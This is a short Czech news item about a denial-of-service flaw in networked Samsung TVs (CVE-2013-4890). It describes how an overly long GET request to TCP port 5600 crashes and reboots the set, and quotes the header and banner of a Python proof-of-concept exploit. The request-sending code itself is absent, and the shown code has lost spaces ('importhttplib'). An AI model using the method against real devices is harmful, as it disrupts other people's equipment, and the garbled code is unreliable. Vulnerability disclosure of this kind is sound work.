Máte-li svou televizi od Samsungu připojenou k síti, může se vám stát, že nedokoukáte svůj oblíbený film. Vzdáleně vám totiž televizor může restartovat zlomyslný útočník.
Tomu totiž stačí, aby znal IP adresu vašeho přijímače a odeslal na její TCP port 5600 speciální GET požadavek, který způsobí pád a následný restart systému.
Kód PoC exploitu
#!/usr/bin/python
# Exploit Title: Samsung TV Denial of Service (DoS) Attack
# Exploit Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com
# Date: 07/21/2013
# CVE Number: CVE-2013-4890
# Vendor Homepage: http://www.samsung.com
# Description:
# The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long HTTP GET request
# As a results, the TV reboots...
# Tested successfully on my Samsung PS50C7700 plasma TV, with the latest firmware :)
importhttplib
importsys
importos
print" *****************************************"
print" Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com\n"
print" Exploit: Denial of Service (DoS) attack\n"
print" Description:\n"
print" The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long request."
print" Tested successfully on my Samsung PS50C7700 plasma TV :)\n"